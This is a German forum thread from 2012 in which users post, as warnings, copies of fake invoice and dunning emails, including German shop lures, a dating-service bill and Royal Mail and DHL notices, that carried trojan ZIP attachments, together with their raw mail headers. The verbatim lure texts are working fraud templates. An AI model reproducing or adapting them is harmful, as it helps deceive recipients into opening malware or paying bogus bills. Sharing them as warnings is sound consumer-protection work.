wir bedanken uns für Ihr Interesse an dem kostenpflichtigen Angebot von Flirt Kontakte GmbH. Seit Ihrer Anmeldung am 15.06.2012 sind nunmehr zwei Wochen verstrichen, ohne dass Sie wirksam von Ihrem Widerrufsrecht Gebrauch gemacht haben. Wir freuen uns daher, dass unser Angebot Ihren Zuspruch gefunden hat und erlauben uns, für die Bereitstellung und Erbringung unserer Dienstleistung das vereinbarte Nutzungsentgelt in Rechnung zu stellen.

Kunden Nr.: QUHHA-093703
Rechnung: ZDQT51757-1865217394

Jahres Anmeldung: 221,48 EUR
Abo Dauer: 04.06.2012 - 03.06.2013

Bitte überweisen Sie den Rechnungsbetrag bis zum 17.07.2012 unter Angabe des Verwendungszwecks MGGS33650-9874946725 an unser Bankkonto:

Kontoinhaber: Arnold GmbH
Konto Nr.: 962211994
Bankleitzahl: 223 809 32

Wir bitten Sie die gesammte Summe innerhalb der gennanten Frist zu überweisen,um die Entstehung zusätzlicher Mahnkosten zu vermeiden.

Beilagen:
- Rechnungsübersicht
- Vertragsdaten

Ferner haben Sie uns gegenüber bestätigt, die diesem Vertrag zugrunde liegenden AGB gelesen und angenommen zu haben. Das Ihnen zustehende Widerrufsrecht haben Sie gar nicht, nicht fristgerecht oder unwirksam ausgeübt.

Mit verbindlichen Grüßen Ihr Support Team

Die Auftrag.zip wird ebenfalls wieder als ATRAPS.Gen2 von AVIRA erkannt --> BKA-Trojaner.

Hier der Header:

Return-Path: <leah [at] lseverson.com>
Delivered-To: GMX delivery to truelife [at] gmx.de
Received: (qmail invoked by alias); 13 Jul 2012 13:46:18 -0000
Received: from ef.e6.84ae.static.theplanet.com (HELO xeno.phpwebhosting.com) [174.132.230.239]
by mx0.gmx.net (mx020) with SMTP; 13 Jul 2012 15:46:18 +0200
Received: (qmail 22750 invoked from network); 13 Jul 2012 13:46:08 -0000
Received: from unknown (HELO mex2003a.mexeagle.local) (leah [at] lseverson.com@66.155.205.117)
by xeno.phpwebhosting.com with SMTP; Fri, 13 Jul 2012 08:46:08 -0500
MIME-Version: 1.0
Date: Fri, 13 Jul 2012 09:40:52 -0400
X-Priority: 3 (Normal)
X-Mailer: Mailman v4.2.5
Subject: TrueLife Mahnungsschreiben keine Antwort
From: leah [at] lseverson.com
To: "TrueLife" <TrueLife [at] gmx.de>
Content-Type: multipart/mixed;
boundary="-----_chilkat_5b5_012d_d9bd4aaa.4cf9b442_.MIX"
Message-ID: <OUTLOOK-IDM-90f6587c-95c1-cd88-6f2e-64299ffbdf55 [at] mex2003a.mexeagle.local>
X-GMX-Antivirus: 0 (no virus found)
X-GMX-Antispam: 5 (eXpurgate);
Detail=5D7Q89H36p7RD0ZwpkL6+eQgmvCvQtD85Z5BwGC8N6d0ovxTH2g7gz7JmP+jC1EUFNUFE
HyT9SqOzkGQDHgnBLBcQkXdvsD5zOrfmwVZ6571fCEf5eXt2tXSw4a4sXmxPri9HzWJmtGr6AyA9
XAsPfN2wvUyzPfSrPCHVGBq0QnXzz8z2Ds0ksQlffF0QoVG8RP4IVDUox3C7fdnptErOxZeQLxuT
pQ4V1;
X-GMX-UID: NjUyOJchSzg3M6R2zjQxhjAxMVn+gclF
X-Flags: 1401

Frechdachs
16.07.2012, 23:00
Hallo zusammen,

mir hat man auch grade versucht einen Virus / Trojaner unterzujubeln.

Die angegebene Firma existiert nicht und die Steuernummer ist auch ungültig.




Sehr geehrte/r Kunde/Kundin,

wohl in in unserem Brief vom 06.06.2012 wurden Sie benachrichtigt, dass die nicht bezahlte Forderung von 1952,56 Euro immer noch nicht beglichen wurde. Mit dieser Email verpflichten wir Sie Ihrer Zahlungsverpflichtung nachzukommen.

Da dies die zweite Mahnung ist, die Sie über Ihre Schulden warnt, sind wir verplichtet Ihnen leider die Kosten von 10,00 Euro dazu zu der noch offenen Forderung als Mahnung in Rechnung stellen.

Wir bitten Sie, den offenen Betrag bis zum 20.07.2012 auf das angegebene Konto zu überweisen.

Andernfalls sind wir gezwungen, unsere Rechnung Inkassounternehmen geltend zu machen.

Zahlschein und Artikel finden Sie in dem beigefügtem Dokument.


Mit freundlichen Grüßen

SeebergShop GmbH
Geschaeftssitz ist Alzenau
Steuer-Nummer DE565725788
Inhaber: Vincent Dietrich


1 Anhang: Produkte 07.2012.zip 20,4 KB


Return-Path: <roseevans [at] suddenlink.net>
Received: from txlegofep02.suddenlink.net (txlegofep02.suddenlink.net [208.180.40.76])
by mtain-de12.r1000.mx.aol.com (Internet Inbound) with ESMTP id 13683380000ED
for <meineadresse [at] provider.de>; Mon, 16 Jul 2012 14:41:51 -0400 (EDT)
Received: from IPSERVER.msp.local ([108.55.202.41])
by txlegofep02.suddenlink.net
(InterMail vM.7.09.01.03 201-2219-108-104-20100907) with ESMTP
id <20120716183649.TGMB23718.txlegofep02.suddenlink.net [at] IPSERVER.msp.local>
for <meineadresse [at] provider.de>; Mon, 16 Jul 2012 13:36:49 -0500
MIME-Version: 1.0
Date: Mon, 16 Jul 2012 14:37:33 -0400
X-Priority: 3 (Normal)
X-Mailer: Evolution/2.4-6mdk
Subject: =?iso-8859-1?Q?Abmahnung_f=FCr_?=
From: roseevans [at] suddenlink.net
To: meineadresse [at] provider.de
Content-Type: multipart/mixed;
boundary="-----_chilkat_501_825b_b0792e6f.2e013f7d_.MIX"
Message-ID: <OUTLOOK-IDM-eceb7753-fbaf-0a4f-2d6c-2865c6b296d0 [at] IPSERVER.msp.local>
X-Cloudmark-Analysis: v=1.1 cv=QZLySw6m5Fy7rpiCYmBgpyNm4of6k3HOFYZFjZ7WLfU= c=1 sm=0 a=Vm81MP2ThugA:10 a=xzW3HwPJiLYA:10 a=jPJDawAOAc8A:10 a=TncenRqkx-JXdlhJT0YA:9 a=wPNLvfGTeEIA:10 a=xlNDx5TkQfAVO-6rOLgA:9 a=IKIoO-ieCDEA:10 a=HpAAvcLHHh0Zw7uRqdWCyQ==:117
x-aol-global-disposition: S
X-AOL-VSS-INFO: 5400.1158/82273
X-AOL-VSS-CODE: clean
X-AOL-SCOLL-SCORE: 0:2:134651088:93952408
X-AOL-SCOLL-URL_COUNT: 0
X-AOL-REROUTE: YES
x-aol-sid: 3039ac1d40d45004606f57d2
X-AOL-IP: 208.180.40.76
X-AOL-SPF: domain : suddenlink.net SPF : none
X-Antivirus: avast! (VPS 120716-0, 16.07.2012), Inbound message
X-Antivirus-Status: Clean
Avast hat (noch) nichts gefunden.

Gruß Frechdachs


Den Quelltext vom Thunderbird habe ich, ist aber zu groß zum posten.

Frechdachs
16.07.2012, 23:35
Und noch mal das gleiche auf einem anderem E-Mailkonto mit anderem Betrag.


Sehr geehrte/r Kunde/Kundin,

bereits in unserem Schreiben vom 16.06.2012 wurden Sie benachrichtigt, dass die nicht beglichene Forderung von 1621,14 Euro immer noch nicht beglichen wurde. Mit dieser E-Mail bitten wir Sie Ihrer Pflicht nachzukommen.

Da dies die zweite Aufforderung ist, die Sie über Ihren Rückstand warnt, sind wir verplichtet Ihnen leider die Kosten von 16,00 Euro dazu zu der noch offenen Forderung als Mahnung in Rechnung stellen.

Wir bitten Sie, den fälligen Betrag bis zum 18.07.2012 auf das angegebene Konto zu begleichen.

Sonst sehen wir uns gezwungen, unsere Forderung durch ein Inkassobüro geltend zu machen.

Zahlschein und Artikel Liste finden Sie in dem beigelegten Schreiben.


Mit verbindlichen Grüßen

WeberVersand GmbH
Firmensitz ist Altenau
Umsatzsteuer DE722435969
Leiter: Nelly Maier


1 Anhang: Bestellung 07.2012.zip 20,4 KB


Return-Path: <232305438 [at] 163.com>
Received: from mproxyjp2.163.com (mproxyjp2.163.com [176.32.86.149])
by mtain-ma03.r1000.mx.aol.com (Internet Inbound) with ESMTP id DA14F38025CEB
for <heelslanylbo [at] aol.com>; Mon, 16 Jul 2012 16:15:33 -0400 (EDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=163.com;
s=s110527; h=Received:MIME-Version:Date:Subject:From:To:
Content-Type:Message-ID; bh=eKKXjz/H6q/f79j3K3t0LrwsHgVtba/LE4dX
E8NX6Ok=; b=UjUJMxR8gDpCb+NcgClv/d8b9bF8zFFuyXYvOqQ+Iiuj56ubhdkS
XgF0KLbRf++NYy5aV5WL4Ky8kxXZoJyqBvLIV9hVCQTQZHpS07PBTFpZMDYs3RP1
xq3qWsyXlyrOx8q3yBAVlTl5p9Kl6rP8GoQQBlbEWTKs/6njrL9TSU4=
Received: from hetzner-b4d8a54 (unknown [41.203.30.148])
by smtp3 (Coremail) with SMTP id DdGowEC5t2+HcgRQoTGbDA--.627S2;
Tue, 17 Jul 2012 03:59:08 +0800 (CST)
MIME-Version: 1.0
Date: Mon, 16 Jul 2012 21:58:59 +0200
X-Priority: 3 (Normal)
X-Mailer: Ximian Evolution 3.2.7 (2.4.5-8)
Subject: =?iso-8859-1?Q?Abmahnung_f=FCr__16.07.2012?=
From: 232305438 [at] 163.com
To: HeelsLaNylBo [at] aol.com
Content-Type: multipart/mixed;
boundary="-----_chilkat_65f_58af_f8c29788.af61cabc_.MIX"
Message-ID: <OUTLOOK-IDM-ae33ceea-7f2b-d693-98d9-0a4779052131 [at] hetzner-b4d8a54>
X-CM-TRANSID:DdGowEC5t2+HcgRQoTGbDA--.627S2
X-Coremail-Antispam: 1Uf129KBjvdXoWrtw4DZF4kGFy7ZrW8Gw1rWFg_yoW3KFgE9w
18AFZxCwn8X3yrtw12yw4rtanrZa48ur93G3WjgrW2q34DtFsxX3ZIgay5W3W5KayYya1U
GwnxWrs3Aay7WjkaLaAFLSUrUUUUUb8apTn2vfkv8UJUUUU8Yxn0WfASr-VFAUDa7-sFnT
9fnUUvcSsGvfC2KfnxnUUI43ZEXa7IU09SdPUUUUU==
X-CM-SenderInfo: istsjiavutmqqrwthudrp/1tbiWwrtLU9orrxDAgAAsl
x-aol-global-disposition: S
X-AOL-VSS-INFO: 5400.1158/82274
X-AOL-VSS-CODE: clean
X-AOL-SCOLL-SCORE: 0:2:176455088:93952408
X-AOL-SCOLL-URL_COUNT: 0
X-AOL-SCOLL-AUTHENTICATION: mail_rly_antispam_dkim-d017.1 ; domain : 163.com DKIM : pass
X-AOL-REROUTE: YES
x-aol-sid: 3039ac1d600b500476655f1d
X-AOL-IP: 176.32.86.149
X-AOL-SPF: domain : 163.com SPF : pass
X-Antivirus: avast! (VPS 120716-0, 16.07.2012), Inbound message
X-Antivirus-Status: Clean

Ich habe mal die beiden 1. Zeilen des Anhang-Quelltextes verglichen.
Sind identisch.

madman70
17.07.2012, 15:20
Und auch hier eine tolle "Abmahnung" in holprigem Deutsch mit einem suspekten ZIP-File im Anhang - immerhin haben die sich eine "Steuer-Nummer" ausgedacht :D



Sehr geehrte Damen und Herren,

wohl in unserer Email vom 14.06.2012 wurden Sie informiert, dass die offene Forderung von 1647,63 Euro noch nicht bezahlt wurde. Mit dieser Email verpflichten wir Sie Ihrer Zahlungsverpflichtung nachzukommen.

Weil dies die zweite Forderung ist, die Sie über Ihren Rückstand in Kenntniss setzt, müssen wir Ihnen leider die Kosten von 14,00 Euro dazu zu der noch offenen Forderung als Mahngebühr in Rechnung stellen.

Wir bitten Sie, den offenen Betrag bis zum 16.07.2012 auf das angegebene Konto zu begleichen.

Sonst wird, unsere Forderung Inkassounternehmen geltend zu machen.

Zahlschein und Produkten Liste finden Sie in dem beigelegten Dokument.


Mit freundlichen Grüßen

BrutterShop GmbH
Geschaeftssitz ist Altentreptow
Steuer-Nummer DE806704435
Verantwortlicher: Christina Lorenz


Und hier der Mailheader:


Return-Path: sivmary [at] memanagement.no
Received: from mail11.webhuset.no ([81.27.32.104]) by mx-ha.web.de (mxweb001) with ESMTP (Nemesis) id 0MC3ZQ-1SzcN83HWq-008ueG for <xxxxx [at] web.de>; Mon, 16 Jul 2012 21:26:03 +0200
Received: (qmail 22129 invoked from network); 16 Jul 2012 19:26:01 -0000
Received: from unknown (HELO AMCI-HOSTED156.AMSHOSTED156.AMTS-ACC-Hosted.prod) (sivmary [at] memanagement.no@207.250.240.153) by 0 with ESMTPA; 16 Jul 2012 19:26:01 -0000
MIME-Version: 1.0
Date: Mon, 16 Jul 2012 13:25:58 -0600
X-Priority: 3 (Normal)
X-Mailer: Evolution/2.9-5mdk
Subject: Abmahnung für xxxxx
From: sivmary [at] memanagement.no
To: "xxxxx" <xxxxx [at] web.de>
Content-Type: multipart/mixed; boundary=-----_chilkat_d5b_1458_2f0a5584.54a09577_.MIX
Message-ID: <OUTLOOK-IDM-ae06d4f0-0450-6f2a-b3f2-0944c222060f [at] AMCI-HOSTED156.AMSHOSTED156.AMTS-ACC-Hosted.prod>
Envelope-To: <xxxxx [at] web.de>
X-UI-Filterresults: ;V01:K0:Tu2q31Sv:bPSw3iqGQAtsizA4lyJ1TxK0CYqadHkZ8GR m5yspwhl/WYGogo5iT0UsyPIv2kCQyRyJulf7MaUFW+xxgG7ErJUwme/y+6z4sBwgfG72RO FeCayzHbZL7tMPOWykbsaP4Dk38FwzHzUbUTAu7NH+1LzC6ABVdyLuHnmHzuqqcTI=

Arthur
26.07.2012, 12:26
Seit ca Anfang Mai geistern diese Fakemails massenweise durchs WWW (http://www.google.de/#hl=de&biw=1024&bih=612&sclient=psy-ab&q=+Rechnung+++Email+++zip+anhang&oq=+Rechnung+++Email+++zip+anhang&gs_l=serp.12...7237.7237.0.8632.1.1.0.0.0.0.150.150.0j1.1.0...0.0...1c.ysIwzfjUl FU&pbx=1&bav=on.2,or.r_gc.r_pw.r_qf.,cf.osb&fp=4b4a352b6e15cc0d)

Die Texte und angeblichen Absender wechseln aber das Grundschema ist gleich:
Nachrichten, die erschrecken sollen und die dazu veranlassen sollen, den mit einem Trojaner
verseuchten zip-Anhang zu öffnen.
von focus.de vom 24.7 Internet: Virus lauert hinter falschen Rechnungen per Mail - Computer - FOCUS Online - Nachrichten (http://www.focus.de/digital/computer/internet-virus-lauert-hinter-falschen-rechnungen-per-mail_aid_786607.html)

Gar nicht erst klicken: Mit fingierten Zahlungsaufforderungen per E-Mail versuchen Kriminelle derzeit, Computernutzer übers Ohr zu hauen. Was hilft, ist ein Virenscanner auf Stand.

thomas1611
26.07.2012, 12:37
Was hilft, ist ein Virenscanner auf Stand.

leider hilft noch nichtmal der - ich habe diverse derartige Mails erhalten und bei Virustotal eingeworfen - die Erkennungsquote war, sagen wir es mal diplomatisch, unterirdisch.

Bei diesen Mails hilft ausschließlich der gesunde Menschenverstand.

Symptomatisch für die potentiellen Opfer ist folgende kleine Anekdote aus den letzten Tagen:
Kunder erhält Mail, rennt damit zum Anwalt - der sagt: alles inkl. Anhänge ausdrucken und dann mitbringen. Verwandschaft ruft dann bei mir an und fragt nach. Ich sagte gleich am Telefon: ungelesen löschen, bei Mißtrauen an mich weiterleiten OHNE den Anhang zu öffnen.
Die folgenden Tage erhilt ich diverse Mails weitergeleitet, trotz einer entsprechenden Kommentierung.

Da frage ich mich doch zusätzlich: braucht auch dieser Anwalt einen Internetführerschein?

Helmi98
23.08.2012, 19:16
Die scheinen eine neue Runde zu starten!

http://www.gutefrage.net/frage/abhocke-hilfe

Vorgestern gab es auch schon eine ähnliche Frage.

truelife
23.08.2012, 19:49
Hier auch wieder eingeschlagen:


Sehr geehrter Benutzer H. T.,

wir haben Sie schon in unserer Email vom 08.07.2012 gemahnt, dass die nicht bezahlte Rechnung von 7665,67 Euro von Ihnen noch nicht überwiesen wurde. Wir fordern Sie damit ein letztes Mal, Ihrer Verpflichtung nachzukommen.

Wir sehen uns gezwungen Ihnen leider die Kosten von 15,00 Euro darüber hinaus zu der noch offenen Forderung als Mahngebühr in Rechnung stellen.

Wir bitten Sie, die nicht bezahlten Kosten bis zum 23.08.2012 auf das angegebene Konto zu übersenden.

Zahlschein und Artikel sind in dem beigelegten Schreiben.

Mit verbindlichen Grüßen

BrandtOnline GmbH
(Mo-Fr 8.00 bis 18.00 Uhr, Sa 10.00 bis 18.00 Uhr)
Gesellschaftssitz ist Auerbach
Umsatzsteuer-ID: DE081491479
Geschäftsfuehrer: M. W.

From - Wed Aug 22 01:14:48 2012
X-Account-Key: account1
X-UIDL: 01SBRn-1TN0Rw0FXJ-00LAnk
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
Return-Path: <stef [at] desertinet.com>
Delivered-To:
Received: (qmail invoked by alias); 21 Aug 2012 23:12:48 -0000
Received: from smtp201.dfw.emailsrvr.com (EHLO smtp201.dfw.emailsrvr.com) [67.192.241.201]
by mx0.gmx.net (mx005) with SMTP; 22 Aug 2012 01:12:48 +0200
Received: from localhost (localhost.localdomain [127.0.0.1])
by smtp20.relay.dfw1a.emailsrvr.com (SMTP Server) with ESMTP id 2F7FC25822A
for ; Tue, 21 Aug 2012 19:12:47 -0400 (EDT)
X-Virus-Scanned: OK
Received: by smtp20.relay.dfw1a.emailsrvr.com (Authenticated sender: stef-AT-desertinet.com) with ESMTPA id 80B8E258190
for ; Tue, 21 Aug 2012 19:12:46 -0400 (EDT)
MIME-Version: 1.0
Date: Tue, 21 Aug 2012 16:12:45 -0700
X-Priority: 3 (Normal)
X-Mailer: Microsoft Outlook Express 9.57.6504.6948
Subject: =?iso-8859-1?Q?Mahnung_f=FCr_H?=
=?iso-8859-1?Q?_T_175770935?=
=?iso-8859-1?Q?31?=
From: stef [at] desertinet.com
To:
Content-Type: multipart/mixed;
boundary="-----_chilkat_582_943b_2190eabf.0fa78ac5_.MIX"
Message-ID: <OUTLOOK-IDM-379ca480-d783-1653-7e3f-aee375200457 [at] citrix.mcdermott-mcnamara.local>
X-GMX-Antivirus: 0 (no virus found)
X-GMX-Antispam: 0 (BackTrace mail analyze);
Detail=5D7Q89H36p4L00VTXC6D4q0N+AH0PUCnGL2vqOgpaBYL16oitsMrgDt/NQNpSCZFFjDOy
97xb7Zpf+wZnd5ZXNcvLDXR3Wg3wRjdQbwEMh8=V1;

Ganz ehrlich. Bei einer Zahlsumme von 7.665,67€ pfeife ich auf die 15€ Mahnkosten. Dafür öffne ich doch echt keinen Anhang... ;)

Baldrian
29.08.2012, 11:29
Ich hoffe, ich habe es hier richtig reingestellt.
Bekam heute eine Mahnung in Höhe von 775,21 Euronen.
Mit Rechnung im Anhang.
Da ich garantiert dort nichts bestellt habe, habe ich mal nach
der Adresse gegoogelt. Und da konnte ich lesen, dass das
ein Trojaner ist.
Also bei dem Betrag könnte ich mir vorstellen, dass einige
erschreckt draufklicken werden.
Schmidt-Online GmbH Arnstein
(Mo-Fr 9.00 bis 18.00 Uhr, Sa 9.00 bis 16.00 Uhr)
Geschäftsführer: J. F.
Steuer-Nr.: DE149831047

Frechdachs
30.08.2012, 09:54
Guten Morgen zusammen,

das ist grade im Spamordner gelandet.
Im Anhang die "Letzte Mahnung 30.08.2012.zip" mit 41,1 KB

Gruß Frechdachs



Sehr geehrter Kunde,

bei der Durchsicht unserer Rechnungen stellten wir fest, dass Sie die Bestellung Nummer 5635215-2012 noch nicht beglichen haben.

Artikel: Apple WG7W5 1764,99 Euro

Hiermit verpflichten wir Sie erneut, Ihre offene Rechnung zu begleichen und damit weitere Inkasso-Büro Kosten einzusparen.

Wir müssen Ihnen 13,00 Euro dazu zu der noch offenen Forderung als Mahngebühr in Rechnung stellen.
Wir bitten Sie, die nicht bezahlten Kosten bis zum 05.09.2012 auf das angegebene Konto zu überweisen.

Der Überweisungsschein und die Lieferadresse liegen dieser E-Mail als Kopie bei.

Mit verbindlichen Grüßen

SchulzeOnlineShop GmbH Aschersleben
Geschäftsführer: J. G.
Umsatzsteuer-Nr.: DE690152448



Return-Path: <isaacch [at] netvision.net.il>
Received: from mxout1.netvision.net.il (mxout1.netvision.net.il [194.90.9.20])
by mtain-dg10.r1000.mx.aol.com (Internet Inbound) with ESMTP id 2F6663800009C
for <name [at] provider.com>; Wed, 29 Aug 2012 23:39:51 -0400 (EDT)
MIME-version: 1.0
Content-type: multipart/mixed; boundary="Boundary_(ID_CMmFALtLwwQ5CjWqn6Ifrw)"
Received: from server1.Taylor.local ([66.49.14.106]) by mxout1.netvision.net.il
(Oracle Communications Messaging Server 7u4-24.01(7.0.4.24.0) 64bit (built Nov
17 2011)) with ESMTPA id <0M9J00GT0U3R5030 [at] mxout1.netvision.net.il> for
name [at] provider.com; Thu, 30 Aug 2012 06:38:17 +0300 (IDT)
Date: Wed, 29 Aug 2012 22:48:32 -0500
X-Priority: 3 (Normal)
X-Mailer: Pegasus Mail for Win32 (v4.31b)
Subject: Mahnung Kundennummer: 9807858776
From: isaacch [at] netvision.net.il
To: name [at] provider.com
Message-id:
<OUTLOOK-IDM-b6430c28-0357-1f5a-0041-662bbbd5f1b9 [at] server1.Taylor.local>
x-aol-global-disposition: G
X-AOL-VSS-INFO: 5400.1158/83488
X-AOL-VSS-CODE: clean
x-aol-sid: 3039ac1d4112503ee0871854
X-AOL-IP: 194.90.9.20
X-AOL-SPF: domain : netvision.net.il SPF : pass
X-Antivirus: avast! (VPS 120829-1, 29.08.2012), Inbound message
X-Antivirus-Status: Clean

MamaLove
30.08.2012, 17:27
hallo,auch ich habe heute eine mail bekommen,wonach ich am 8. eine nikon bestellt haben soll.ich habe den anhang nicht geöffnet,da ich mir 100% sicher bin,des es nicht stimmt.


Hallo, bei der Durchsicht unserer Zahlungseingänge stellten wir fest, dass Sie die Rechnung Nummer 4547389/2012 noch nicht beglichen haben. Artikel: Nikon RW53V 2037,75 Euro Hiermit fordern wir Sie so schnell wie möglich, Ihre offene Rechnung zu begleichen und damit weitere juristische Kosten einzusparen. Wir sehen uns gezwungen Ihnen 13,00 Euro darüber hinaus zu der noch offenen Forderung als Mahngebühr in Rechnung stellen.Wir bitten Sie, den fälligen Betrag bis zum 01.09.2012 auf das angegebene Konto zu übersenden. Die Rechnung und die Lieferadresse liegen diesem Brief als Beilage bei.
Mit verpflichtenden Grüßen
BrutterShop GmbH
Adenau
Leiter: M. F.
Fimen-Nummer: DE940373153

das ist der Inhalt dieser Mail.
wie soll ich mich jetzt weiter verhalten?

erdbeernase
30.08.2012, 17:44
wie soll ich mich jetzt weiter verhalten?

Wie wäre es mit löschen, oder hättest du gern einen Trojaner (http://de.wikipedia.org/wiki/Trojanisches_Pferd_(Computerprogramm)) auf deinem Rechner?

MamaLove
30.08.2012, 19:56
gelöscht hab ich sie und vorher hab ich die mail als betrügerische pishingmail gemeldet.
was ich meine,kommt da noch was nach?von denen,die mir die mail geschickt haben,soll ich das ausdrucken und zur pol?oder einfach nichts weiter machen?

erdbeernase
30.08.2012, 20:43
kommen wird sowas immer mal.
Einfach löschen. Ob du zur Polizei gehst oder nicht, bleibt halt dir überlassen.
Allerdings wird da nix unternommen, weil das ja nicht die Firma ist die da als sogenannter Absender steht.
Währe auch wie ein Streichholz im Atlantischen Ozean zu finden :-)

Goofy
31.08.2012, 12:22
Man sollte solche Mails löschen und ignorieren. Die Täter sind regelmäßig nicht zu ermitteln, weil der Mailversand anonym über mehrere Zwischenstufen getarnt wird.

Mittwoch
10.09.2012, 23:36
Heute schlugen gleich acht Mails auf, in denen die Masche auf Englisch versucht wird. Drei Beispiele:

Return-Path: <quickie [at] royalmail.com>
Delivery-Date: Mon, 10 Sep 2012 09:26:05 +0200
Received-SPF: neutral (mxbap3: 123.157.211.34 is neither permitted nor denied by domain of royalmail.com) client-ip=123.157.211.34; envelope-from=quickie [at] royalmail.com; helo=[123.157.211.34];
Received: from [123.157.211.34] ([123.157.211.34]) by mx.kundenserver.de (node=mxbap3) with ESMTP (Nemesis) id [schnipp] for [schnapp]; Mon, 10 Sep 2012 09:26:05 +0200
Received: from VFUS-MBX03.vf-us.internal.vodafone.com ([::1]) by VFUS-CAS01.vf-us.internal.vodafone.com ([10.181.10.42]) with mapi; Mon, 10 Sep 2012 15:26:02 +0800
From: Royal Mail <noreply [at] royalmail.com>

Delivery-Date: Mon, 10 Sep 2012 09:25:19 +0200
Received-SPF: neutral (mxeu5: 14.219.190.214 is neither permitted nor denied by domain of royalmail.com) client-ip=14.219.190.214; envelope-from=skitingku8 [at] royalmail.com; helo=[14.219.190.214];
Received: from [14.219.190.214] ([14.219.190.214]) by mx.kundenserver.de (node=mxeu5) with ESMTP (Nemesis) id [schnipp] for [schnapp]; Mon, 10 Sep 2012 09:25:18 +0200
Received: from outmail012.snc7.facebook.com (HELO mx-out.facebook.com) ([69.171.232.146]) with ESMTP; Mon, 10 Sep 2012 15:25:01 +0800
Received: from [10.64.120.50] ([10.64.120.50:34638]) by smout016.snc7.facebook.com (envelope-from <notification+kjdm-dj-hud_ [at] facebookmail.com>) (ecelerity 2.2.2.45 r(34222M)) with ECSTREAM id 40/AC-03990-B59ED7F4; Mon, 10 Sep 2012 15:25:01 +0800
X-Facebook: from zuckmail ([MTI3LjAuMC4x]) by graph.facebook.com with HTTP (ZuckMail);
Date: Mon, 10 Sep 2012 15:25:01 +0800
From: Facebook <notification+ntlq-mb-zzg_ [at] facebookmail.com>
Man beachte, dass die eben genannte Mail angeblich von Facebook kommt, angekündigt wird aber ein Geschäftsvorgang der britischen Royal Mail :facepalm:

Return-Path: <quickie [at] royalmail.com>
Delivery-Date: Mon, 10 Sep 2012 09:26:05 +0200
Received-SPF: neutral (mxbap3: 123.157.211.34 is neither permitted nor denied by domain of royalmail.com) client-ip=123.157.211.34; envelope-from=quickie [at] royalmail.com; helo=[123.157.211.34];
Received: from [123.157.211.34] ([123.157.211.34]) by mx.kundenserver.de (node=mxbap3) with ESMTP (Nemesis) id [schnipp] for [schnapp]; Mon, 10 Sep 2012 09:26:05 +0200
Received: from VFUS-MBX03.vf-us.internal.vodafone.com ([::1]) by VFUS-CAS01.vf-us.internal.vodafone.com ([10.181.10.42]) with mapi; Mon, 10 Sep 2012 15:26:02 +0800
From: Royal Mail <noreply [at] royalmail.com>
Der Betreff ist in allen Mails "Royal Mail Shipping Advisory, Mon, 10 Sep 2012 [leicht variierende Uhrzeit] +0800", morgen dann vermutlich mit Datum von morgen. Auch die Texte gleichen sich:


Royal Mail Group Shipment Advisory The following 1 piece(s) have been sent via Royal Mail on Mon, 10 Sep 2012 [Uhrzeit aus dem Betreff] +0800, REF# [zehnstellige Zahl, vermutlich zufällig erzeugt, in jeder Mail eine andere] SHIPMENT CONTENTS: Documents SHIPPER REFERENCE: PLEASE REFER TO ATTACHED FILE ADDITIONAL MESSAGE FROM SHIPPER: PLEASE REFER TO ATTACHED FILE Royal Mail Group Ltd 2012. All rights reserved
Allen Mails ist der Anhang "Royal_Mail_Shipping_Ref[zwei Buchstaben, fünf Zahlen, in jeder Mail andere].zip", welcher laut virustotal.com mindestens zwei verschiedene Trojaner enthält.

Wie immer gilt: Niemals Dateianhänge öffnen, welche nicht hundertprozentig sicher aus zuverlässigen Quellen stammen, im Zweifel immer beim vermeintlichen Absender rückfragen!

Mittwoch
12.09.2012, 10:41
Heute für DHL, wieder englischsprachig:

Return-Path: <levelnessnow25 [at] dhl.com>
Delivery-Date: Wed, 12 Sep 2012 10:07:13 +0200
Received-SPF: softfail (mxeu5: transitioning domain of dhl.com does not designate 203.125.40.101 as permitted sender) client-ip=203.125.40.101; envelope-from=levelnessnow25 [at] dhl.com; helo=[203.125.40.101];
Received: from [203.125.40.101] ([203.125.40.101]) by mx.kundenserver.de (node=mxeu5) with ESMTP (Nemesis) id [schnipp] for [schnapp]; Wed, 12 Sep 2012 10:07:13 +0200
X-Spam-Relays-Untrusted: [ ip=165.72.200.102 rdns= helo=gateway1c.dhl.com by=mail5.getronics.com ident= envfrom= intl=0 id= auth= msa=0 ] [ ip=2.116.16.209 rdns=gb-dkgivr01.gb.dhl.com helo=gb-dkgivr01 by=gateway1c.dhl.com ident= envfrom= intl=0 id= auth= msa=0 ] [ ip=2.116.16.209 rdns= helo=gb-dkgivr01 by=gb-dkgivr01 ident= envfrom= intl=0 id= auth= msa=0 ]
Received: from gateway1c.dhl.com ([165.72.200.102]) by mail5.getronics.com with ESMTP; Wed, 12 Sep 2012 16:07:08 +0800
Received: from gb-dkgivr01.gb.dhl.com (HELO gb-dkgivr01) ([2.116.16.209]) by gateway1c.dhl.com with ESMTP; Wed, 12 Sep 2012 16:07:08 +0800
Received: from gb-dkgivr01 ([2.116.16.209]) by gb-dkgivr01 with Microsoft SMTPSVC(5.0.2195.6713); Wed, 12 Sep 2012 16:07:08 +0800
Date: Wed, 12 Sep 2012 16:07:08 +0800

Wie man sieht, zuverlässig als Spam erkannt. Der Betreff lautet "DHL Online Billing Notification [drei Buschstaben, 8 Zahlen]", Text:


Thank you for using the DHL Online Billing service.

Note the Terms of the contract stating you will pay electronically and not via a paper check with this billing option.
If you have any issues/concerns with this invoice or wish to contact DHL, please read below for instructions.

Your latest invoice:
Invoice Date: 08/31/2012

Customer Number: *** [von Mittwoch entfernt]
Invoice Number: *** [von Mittwoch entfernt]

Invoice Due Date: 09/15/2012
Invoice Total: $39.57
Total Airbills: 3

If you have chosen to receive shipment level information with this invoice, it is included in the attachment sent with this message with full details.

To pay your invoice(s) online, simply login to DHL (https://sso.dhl-usa.com/) and click on the "View Online Billing account" link; you can then select the invoice(s) you wish to pay on the "Open Invoices" page and press the "Schedule payment(s)" link to schedule your payment. You can have your invoice(s) automatically paid each month by selecting the " Autopay on invoice due date" in the "View my profile" link.

Thank you for choosing DHL.
***********************************************************************
Please do not reply to this email; it is used to send automated emails and is not monitored for responses. If you have questions, please contact DHL Customer Support at 1-800-722-0081. If you wish to communicate via email, please visit (http://www.dhl-usa.com/custserv/contactus.asp?nav=ContactUs).
Angehängt ist eine "DHL_Billing_Notification[drei Buchstaben, acht Zahlen, nicht mit der Nummer aus dem Betreff identisch].zip", bei der es – wen wunderts noch – Treffer für drei verschiedene Trojaner gibt. Also auch hier Finger weg!

Baldrian
28.11.2012, 11:40
